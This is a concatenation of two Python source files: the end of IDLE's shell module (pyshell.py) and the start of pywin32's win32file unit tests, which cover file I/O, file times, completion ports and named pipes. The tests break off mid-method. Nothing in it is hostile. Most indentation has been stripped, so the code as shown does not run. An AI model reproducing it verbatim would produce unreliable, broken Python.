if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Window"),
("help", "_Help"),
]
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = PseudoInputFile(self, "stdin", iomenu.encoding)
self.stdout = PseudoOutputFile(self, "stdout", iomenu.encoding)
self.stderr = PseudoOutputFile(self, "stderr", iomenu.encoding)
self.console = PseudoOutputFile(self, "console", iomenu.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use TextViewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if this is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
def write(self, s, tags=()):
if isinstance(s, str) and len(s) and max(s) > '\uffff':
# Tk doesn't support outputting non-BMP characters
            # Let's assume the printed string is not very long;
            # find the first non-BMP character and construct an informative
            # UnicodeEncodeError exception.
for start, char in enumerate(s):
if char > '\uffff':
break
raise UnicodeEncodeError("UCS-2", char, start, start+1,
'Non-BMP character not supported in Tk')
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
else:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
                    # filename is actually a directory; skip it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
            # On OSX: when the user has double-clicked on a file that causes
            # IDLE to be launched, the shell window will open just in front of
            # the file they want to see. Lower the interpreter window when
            # there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['pyshell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
test_win32file.py
|
import unittest
from pywin32_testutil import str2bytes, TestSkipped, testmain
import win32api, win32file, win32pipe, pywintypes, winerror, win32event
import win32con, ntsecuritycon
import sys
import os
import tempfile
import threading
import time
import shutil
import socket
import datetime
import random
try:
import win32timezone
except SyntaxError:
# win32timezone uses decorators and isn't compatible with py2.3
assert sys.version_info < (2,4)
try:
set
except NameError:
from sets import Set as set
class TestReadBuffer(unittest.TestCase):
def testLen(self):
buffer = win32file.AllocateReadBuffer(1)
self.failUnlessEqual(len(buffer), 1)
def testSimpleIndex(self):
val = str2bytes('\xFF')
buffer = win32file.AllocateReadBuffer(1)
buffer[0] = val
self.failUnlessEqual(buffer[0], val)
def testSimpleSlice(self):
buffer = win32file.AllocateReadBuffer(2)
val = str2bytes('\0\0')
buffer[:2] = val
self.failUnlessEqual(buffer[0:2], val)
class TestSimpleOps(unittest.TestCase):
def testSimpleFiles(self):
try:
fd, filename = tempfile.mkstemp()
except AttributeError:
self.fail("This test requires Python 2.3 or later")
os.close(fd)
os.unlink(filename)
handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None)
test_data = str2bytes("Hello\0there")
try:
win32file.WriteFile(handle, test_data)
handle.Close()
# Try and open for read
handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None)
rc, data = win32file.ReadFile(handle, 1024)
self.assertEquals(data, test_data)
finally:
handle.Close()
try:
os.unlink(filename)
except os.error:
pass
# A simple test using normal read/write operations.
def testMoreFiles(self):
# Create a file in the %TEMP% directory.
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE
# Set a flag to delete the file automatically when it is closed.
fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE
h = win32file.CreateFile( testName, desiredAccess, win32file.FILE_SHARE_READ, None, win32file.CREATE_ALWAYS, fileFlags, 0)
# Write a known number of bytes to the file.
data = str2bytes("z") * 1025
win32file.WriteFile(h, data)
self.failUnless(win32file.GetFileSize(h) == len(data), "WARNING: Written file does not have the same size as the length of the data in it!")
# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(h, len(data)+10) # + 10 to get anything extra
self.failUnless(hr==0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data)//2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName))
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(size==newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()")
self.failUnless(attr==win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes")
h = None # Close the file by removing the last reference to the handle!
self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!")
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
f = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0)
try:
#Write some data
data = str2bytes('Some data')
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
#Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
#Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
if not issubclass(pywintypes.TimeType, datetime.datetime):
# maybe should report 'skipped', but that's not quite right as
# there is nothing you can do to avoid it being skipped!
return
filename = tempfile.mktemp("-testFileTimes")
now_utc = win32timezone.utcnow()
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None, win32file.CREATE_ALWAYS, 0, 0)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverse - set local, check against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
if issubclass(pywintypes.TimeType, datetime.datetime):
from win32timezone import TimeZoneInfo
now = datetime.datetime.now(tz=TimeZoneInfo.local())
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
else:
rc, tzi = win32api.GetTimeZoneInformation()
bias = tzi[0]
if rc==2: # daylight-savings is in effect.
bias += tzi[-1]
bias *= 60 # minutes to seconds...
tick = int(time.time())
now = pywintypes.Time(tick+bias)
nowish = pywintypes.Time(tick+bias+1)
later = pywintypes.Time(tick+bias+120)
filename = tempfile.mktemp("-testFileTimes")
        # Per the Windows docs, the 'last time' isn't valid until the last
        # write handle is closed - so create the file, then re-open it to check.
open(filename,"w").close()
f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None,
win32con.OPEN_EXISTING, 0, None)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct))
self.failUnless( now <= ct <= nowish, (now, ct))
self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now,wt))
self.failUnless( now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
if issubclass(pywintypes.TimeType, datetime.datetime):
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
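# A minimal sketch (hypothetical helper, not part of the original test file) of
# the plain CreateFile/WriteFile/ReadFile round trip that TestSimpleOps
# exercises above; it relies on the win32file/win32con/tempfile imports at the
# top of this module.
def _simple_file_round_trip_sketch(payload=str2bytes("Hello\0there")):
    fd, filename = tempfile.mkstemp()
    os.close(fd)
    os.unlink(filename)
    handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None,
                                  win32con.CREATE_NEW, 0, None)
    try:
        win32file.WriteFile(handle, payload)
    finally:
        handle.Close()
    # Re-open for read and make sure the same bytes come back.
    handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None,
                                  win32con.OPEN_EXISTING, 0, None)
    try:
        rc, data = win32file.ReadFile(handle, 1024)
        assert data == payload, "read back different bytes than were written"
        return data
    finally:
        handle.Close()
        os.unlink(filename)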
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
        # Create the file and write a large amount of data to it.
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
if not data is buffer:
self.fail("Unexpected result from ReadFile - should be the same buffer we passed it")
except win32api.error:
break
h.Close()
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE,
0, 0, 0)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error, details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo: pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = \
win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our check of
# reference counting should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(RuntimeError,
win32file.GetQueuedCompletionStatus, port, -1)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death = 0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX|
win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE|
win32pipe.PIPE_READMODE_MESSAGE|
win32pipe.PIPE_WAIT,
1, BUFSIZE, BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(target=self._IOCPServerThread, args=(handle,port, test_overlapped_death))
t.setDaemon(True) # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.isAlive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
